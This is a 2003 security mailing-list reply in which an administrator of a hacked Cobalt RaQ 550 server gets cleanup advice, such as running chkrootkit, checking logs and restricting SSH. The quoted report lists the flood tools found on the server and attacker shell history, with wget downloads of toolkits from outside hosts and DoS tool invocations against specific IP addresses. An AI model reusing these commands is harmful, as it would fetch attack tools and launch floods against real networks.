[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] raq 550 hacked

Subject: Re: [cobalt-security] raq 550 hacked
From: "Antonio" <nino@xxxxxxxxxxx>
Date: Mon, 6 Oct 2003 17:14:23 -0300
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

vadimII/vadimI are network flooders ... Most of these program can be
exploits or rootkits, a good thing to do is run "chkrootkit" to try to see
if you have any rootkit instaled, hidden process, etc ... If its an option,
try to isolate that hacked HD, mount it on a clean box and scan it ...Take a
good look in your log files to try to track this "hacker" (including httpd,
especially the sites that run under these users, the "hacker" could got in
in the first place by a flaw in a CGI script, etc) ... Another good thing is
to firewall SHH port and allow only trusted IPs to connect. Also, if no
rootkit/trojan or modified system files was detected and you have all the
security patches applied, sounds like passwords have been cracked, in this
case a massive password change would be needed ... hope this helps ...

[]'s
Nino


----- Original Message -----
From: "Tik & Klik Internetdiensten" <info@xxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Monday, October 06, 2003 4:14 PM
Subject: [cobalt-security] raq 550 hacked


> Hello,
>
> this weekend it looks like a raq 550 of mine whas hacked.
> i tracked some processes that was flooding.
> the program was called vladimII
>
> it was runned on the name of a user that had ssh access.
> when i blocked this user it started a day later with a nother user.
>
> this 2 users are from different sites on the same machine.
> But these 2 users are fronm the same person.
> tracking the ip's i came out in Washington
> but the user is dutch so it looks like someone hacked his computer to
> retreive his passwords ?
>
> Is there a way to look if the raq is infected or that blokking this user
to
> ssh will be enough
> the program was russing whas in the /home/tmp dir in the map flood, a list
> is below.
> the file broadcast.txt has 2102 ip's in it.
>
> i also have saved the bash history of the 2 users.
> there are several programs that was downloaded to my server.
> i shorted the bash to the progroms that was downloaded below this mail
>
> please advice
>
> ----------
> -rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
> -rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop
> -rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
> -rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
> -rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh
> -rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno
> -rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea
> -rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop
> -rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8
> -rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s
> -rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl
> -rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2
> -rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3
> -rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2
> -rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3
> -rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack
> -rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5
> -rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
> -rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
> -rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth
> -rwxr-xr-x 1 xxx users 15087 May 13 2001 stream
> -rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2
> -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
> -rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose
> -rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk
> -rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7
> -rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend
> -rwxr-xr-x 1 xxx users 23587 May 13 2001 trash
> -rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2
> -rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp
> -rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI
> -rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
> -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
> -rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy
> -rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock
>
> -----
> bash history
> wget www.ps-lov.us/pizda.tgz
> wget snow.prohosting.com/muiemuie/p.tar.gz
> wget snow.prohosting.com/muiemuie/p.tgz
> wget snow.prohosting.com/muiemuie/km3.tgz
> wget 65.113.119.133/muiemuie/km3.tgz
>
> its runns programs like
> ./super 69.65.48.23 53 nasa.gov
> ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
> ./cw 210.0.204.185
> ./stealth 210.0.204.185 6500000000000
> ./super 64.207.19.6 53 nasa.gov
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>

References:
- [cobalt-security] raq 550 hacked
  - From: Tik & Klik Internetdiensten

Prev by Date: Re: [cobalt-security] raq 550 hacked
Next by Date: [cobalt-security] Help a NEWBIE on relaying email
Previous by thread: Re: [cobalt-security] raq 550 hacked
Next by thread: [cobalt-security] Help a NEWBIE on relaying email

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index